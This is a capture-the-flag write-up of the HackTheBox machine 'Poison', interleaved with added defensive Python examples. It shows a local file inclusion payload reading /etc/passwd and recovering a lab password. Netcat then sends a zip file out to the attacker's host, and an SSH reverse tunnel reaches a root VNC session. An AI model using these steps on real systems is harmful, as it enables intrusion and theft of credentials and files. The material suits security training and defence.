HackTheBox - Poison Writeup

Source: https://www.absolomb.com/2018-09-08-HackTheBox-Poison/

Poison is a fairly simple CTF box on HackTheBox, but it does contain a few interesting and unusual things.

Initial Access

Network Enumeration

As usual, let's start with a quick nmap scan.

root@kali:~# nmap -sV 10.10.10.84

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-24 12:27 CDT
Nmap scan report for 10.10.10.84
Host is up (0.052s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Let's look at the page on port 80 in a browser.

We can try each of these file names in turn in the Scriptname field. When we submit listfiles.php, the page outputs the following:

Note the form of the URL: the way these files are called may be vulnerable to LFI.

Let's look at pwdbackup.txt first, since that file looks interesting.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=pwdbackup.txt

This password is secure, it's encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=

Encoded 13 times... fine, let's write a quick Python script to decode it rather than running the decode by hand over and over.

import base64

string = """
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo= """

def decode(b64_string, iterations):
    # Each pass strips one base64 layer. b64decode ignores the embedded
    # newlines and surrounding whitespace, so the blob can be pasted as-is.
    for _ in range(iterations):
        b64_string = base64.b64decode(b64_string).decode('utf-8')
    print(b64_string)

decode(string, 13)

Save the script and run it:

root@kali:~/htb/poison# python3 decode.py
Charix!2#4%6&8(0
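The script above hard-codes the layer count because the file announced it. The following is an added example (not part of the original writeup) that generalises the same technique: it peels nested base64 layers until the data stops looking like base64, so the count does not have to be known in advance. The blob it decodes is a constructed sample built by wrap(), not the box's pwdbackup.txt; the stop rule (strict alphabet, length divisible by four, output must be UTF-8) is a heuristic assumption that can over-decode a plaintext which happens to be valid base64.

```python
import base64
import binascii
import re

# Constructed sample secret standing in for the box's password (not real data).
SAMPLE_SECRET = "example-secret-value"

# Strict base64 alphabet plus whitespace (the original blob is wrapped at 76 chars).
B64_RE = re.compile(rb"^[A-Za-z0-9+/=]+$")


def wrap(plaintext, layers):
    """Encode `plaintext` with base64 `layers` times, mirroring the original blob.

    base64.encodebytes inserts a newline every 76 characters, so each layer
    also carries the line breaks that the page's pwdbackup.txt had.
    """
    data = plaintext.encode()
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data.decode()


def peel(blob, max_layers=64):
    """Strip nested base64 layers until the data no longer looks like base64.

    Returns (plaintext, layers_removed). A layer is only removed when the
    whitespace-stripped data is strictly base64, its length is a multiple of
    four, and the decoded bytes are valid UTF-8; otherwise we stop and return
    what we have. max_layers guards against pathological input.
    """
    data = blob.encode()
    layers = 0
    while layers < max_layers:
        compact = b"".join(data.split())  # drop newlines/spaces between chunks
        if not compact or not B64_RE.match(compact) or len(compact) % 4:
            break
        try:
            decoded = base64.b64decode(compact, validate=True)
            decoded.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        data = decoded
        layers += 1
    return data.decode("utf-8").strip(), layers


if __name__ == "__main__":
    blob = wrap(SAMPLE_SECRET, 13)
    plaintext, n = peel(blob)
    print(f"removed {n} layers -> {plaintext}")
```

Run the file directly and it builds a 13-layer blob from the constructed secret and unwraps it; to use it on a captured file, pass the file contents to peel() instead. If a plaintext is itself short, purely alphanumeric and a multiple of four characters long, the heuristic may peel one layer too many, which is why the layer count is returned alongside the result.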

OK! We have the password, but we still need a username. Let's test whether there really is an LFI vulnerability.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../etc/passwd

<br />
<b>Warning</b>:  include(../../../etc/passwd): failed to open stream: No such file or directory in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '../../../etc/passwd' for inclusion (include_path='.:/usr/local/www/apache24/data') in <b>/usr/local/www/apache24/data/browse.php</b> on line <b>2</b><br />

Here we can see that include() is indeed used, and the error also leaks the include path, so we need to go up five directory levels to reach the filesystem root.

root@kali:~/htb/poison# curl http://10.10.10.84/browse.php?file=../../../../../etc/passwd
# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
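The root cause above is an include() fed directly from the file parameter. As an added example (not code from the writeup or the box), here is the check a defender would put in front of such an include, written in Python so it can be exercised offline: the requested name is URL-decoded, must be a bare relative filename, and its canonical path must remain under the document root. The document root path is taken from the error message on the page; the optional allowlist and the double-decoding are assumptions about how a hardened version would be configured.

```python
import os
from urllib.parse import unquote


class IncludeRejected(Exception):
    """Raised when a requested include path escapes the document root."""


def resolve_include(base_dir, requested, allowed_names=None):
    """Map an untrusted `file=` parameter onto a canonical path inside base_dir.

    Hardened stand-in for a bare include($_GET['file']):
      * decode twice so %252e%252e%252f (double-encoded ../) is seen for what it is
      * reject absolute paths and embedded NUL bytes outright
      * canonicalise and require the result to stay under base_dir
      * optionally restrict to an explicit allowlist of script names
    Returns the absolute canonical path or raises IncludeRejected.
    """
    name = unquote(unquote(requested))
    if not name or name.startswith(("/", "\\")) or "\x00" in name:
        raise IncludeRejected(requested)
    if allowed_names is not None and name not in allowed_names:
        raise IncludeRejected(requested)
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # The traversal check: "../../../../../etc/passwd" canonicalises to
    # /etc/passwd, whose common prefix with base is not base itself.
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected(requested)
    return candidate


def is_safe_include(base_dir, requested, allowed_names=None):
    """Boolean wrapper around resolve_include for logging or tests."""
    try:
        resolve_include(base_dir, requested, allowed_names)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    # Document root from the PHP warning on the page; inputs are constructed.
    base = "/usr/local/www/apache24/data"
    for req in ("pwdbackup.txt", "../../../../../etc/passwd",
                "..%2f..%2f..%2f..%2f..%2fetc%2fpasswd", "/etc/passwd"):
        print(f"{req!r:50} -> {'allowed' if is_safe_include(base, req) else 'rejected'}")
```

The canonical-path check alone stops traversal; adding the allowlist (the four scripts the page lets the user pick from) removes the file parameter as a free-form input entirely, which is the fix that also closes off wrapper schemes such as php:// that a path check does not consider.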

We see a user named charix. Let's try ssh with this username and the password we recovered.

root@kali:~/htb/poison# ssh charix@10.10.10.84
Password for charix@Poison:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4
FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017
Welcome to FreeBSD!
Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/
Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.
Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier
Edit /etc/motd to change this login announcement.
You can often get answers to your questions about FreeBSD by searching in the
FreeBSD mailing list archives at
        http://www.FreeBSD.org/search/search.html
charix@Poison:~ %

Excellent!

Privilege Escalation

Looking around the home directory, we see a suspicious zip file.

charix@Poison:~ % ls -al
total 48
drwxr-x---  2 charix  charix   512 Mar 19 17:16 .
drwxr-xr-x  3 root    wheel    512 Mar 19 16:08 ..
-rw-r-----  1 charix  charix  1041 Mar 19 17:16 .cshrc
-rw-rw----  1 charix  charix     0 Mar 19 17:17 .history
-rw-r-----  1 charix  charix   254 Mar 19 16:08 .login
-rw-r-----  1 charix  charix   163 Mar 19 16:08 .login_conf
-rw-r-----  1 charix  charix   379 Mar 19 16:08 .mail_aliases
-rw-r-----  1 charix  charix   336 Mar 19 16:08 .mailrc
-rw-r-----  1 charix  charix   802 Mar 19 16:08 .profile
-rw-r-----  1 charix  charix   281 Mar 19 16:08 .rhosts
-rw-r-----  1 charix  charix   849 Mar 19 16:08 .shrc
-rw-r-----  1 root    charix   166 Mar 19 16:35 secret.zip
-rw-r-----  1 root    charix    33 Mar 19 16:11 user.txt

Let's transfer the zip file to our local machine with netcat.

charix@Poison:~ % nc -w 2 10.10.14.8 443 < secret.zip
root@kali:~/htb/poison# nc -lvnp 443 > secret.zip
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.84] 13787

The zip file is password protected, but we can try charix's ssh password to extract it. And it works!

root@kali:~/htb/poison# unzip secret.zip
Archive:  secret.zip
[secret.zip] secret password:
 extracting: secret

Checking the file type, it should be a regular ASCII text file.

root@kali:~/htb/poison# file secret
secret: Non-ISO extended-ASCII text, with no line terminators
root@kali:~/htb/poison# cat secret
[|Ֆz!

However, the file content is just garbage characters. Let's take a closer look at the server. Checking the running processes with ps aux, we see the following interesting entries.

root    529   0.0  0.9  23620  8996 v0- I    19:17     0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geo
root    540   0.0  0.7  67220  7060 v0- I    19:17     0:00.07 xterm -geometry 80x24+10+10 -ls -title X Desktop

We also see some ports listening on localhost only.

charix@Poison:~ % netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*

Ports 5801 and 5901 are typically used by VNC, which matches the running VNC session we saw in the process list. Let's forward the port back to our local machine so that we can reach it (make sure SSH is running on your local machine!).

charix@Poison:~ % ssh -l root -R 5801:127.0.0.1:5901 10.10.14.8
root@10.10.14.8's password:
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@kali:~#

If we check the listening sockets on Kali, we can see that the port forward succeeded.

root@kali:~# netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5801          0.0.0.0:*               LISTEN
tcp        0      0 10.10.14.8:44976        10.10.10.84:22          ESTABLISHED
tcp        0      0 10.10.14.8:22           10.10.10.84:54672       ESTABLISHED
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 ::1:5801                :::*                    LISTEN
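The lesson of the two netstat listings above is that binding a service to 127.0.0.1 hides it from an external nmap scan but not from anyone who already has a shell, since an SSH tunnel reaches it just as well. As an added example (not from the writeup), here is a small audit in Python that parses BSD-style netstat -an output, lists the listening TCP sockets, and flags the loopback-only ones and the ones in the conventional VNC port ranges. The input is a constructed sample modelled on the Poison listing; the host.port splitting reflects the BSD convention of joining address and port with a dot, which differs from the address:port form in the Linux listing.

```python
from ipaddress import ip_address

# Constructed sample in the FreeBSD `netstat -an` format (not a live capture).
NETSTAT_SAMPLE = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (state)
tcp4       0      0 10.10.10.84.22         10.10.14.8.44976       ESTABLISHED
tcp4       0      0 127.0.0.1.25           *.*                    LISTEN
tcp4       0      0 *.80                   *.*                    LISTEN
tcp6       0      0 *.80                   *.*                    LISTEN
tcp4       0      0 *.22                   *.*                    LISTEN
tcp6       0      0 *.22                   *.*                    LISTEN
tcp4       0      0 127.0.0.1.5801         *.*                    LISTEN
tcp4       0      0 127.0.0.1.5901         *.*                    LISTEN
udp4       0      0 *.514                  *.*
udp6       0      0 *.514                  *.*
"""


def split_bsd_addr(field):
    """BSD netstat joins host and port with a dot: '127.0.0.1.5901' -> ('127.0.0.1', 5901).

    Splitting on the last dot keeps dotted-quad addresses intact; '*' wildcards
    come back as the literal host '*'.
    """
    host, _, port = field.rpartition(".")
    return host, (int(port) if port.isdigit() else None)


def listening_sockets(netstat_text):
    """Return (proto, host, port) for every TCP socket in LISTEN state."""
    result = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 6 and parts[0].startswith("tcp") and parts[-1] == "LISTEN":
            host, port = split_bsd_addr(parts[3])
            result.append((parts[0], host, port))
    return result


def loopback_only(sockets):
    """Listeners bound to a loopback address: invisible to an external port
    scan, but reachable by any local account (for instance over an SSH tunnel)."""
    out = []
    for proto, host, port in sockets:
        try:
            if ip_address(host).is_loopback:
                out.append((proto, host, port))
        except ValueError:
            pass  # '*' wildcard or a hostname rather than an address
    return out


def vnc_listeners(sockets):
    """VNC conventionally uses 5900+display for RFB and 5800+display for the
    HTTP/Java viewer; flag anything in either range."""
    return [(h, p) for _, h, p in sockets
            if p is not None and (5800 <= p <= 5899 or 5900 <= p <= 5999)]


if __name__ == "__main__":
    socks = listening_sockets(NETSTAT_SAMPLE)
    print("loopback-only listeners:", loopback_only(socks))
    print("VNC-range listeners:   ", vnc_listeners(socks))
```

On a real host, feed it the output of netstat -an and cross-check every loopback-only entry against the process list, as the writeup does with Xvnc; a service that only needs to be reachable by root should not accept a password that a lower-privileged user can find in their home directory.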

Vncviewer supports a -passwd option that takes a password file for authentication, so we may be able to hand it the secret file we obtained earlier.

root@kali:~/htb/poison# vncviewer -h
TightVNC Viewer version 1.3.9
Usage: vncviewer [<OPTIONS>] [<HOST>][:<DISPLAY#>]
       vncviewer [<OPTIONS>] [<HOST>][::<PORT#>]
       vncviewer [<OPTIONS>] -listen [<DISPLAY#>]
       vncviewer -help
<OPTIONS> are standard Xt options, or:
        -via <GATEWAY>
        -shared (set by default)
        -noshared
        -viewonly
        -fullscreen
        -noraiseonbeep
        -passwd <PASSWD-FILENAME> (standard VNC authentication)

root@kali:~/htb/poison# vncviewer -passwd secret 127.0.0.1:5801
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"

Yes, that's it, done!
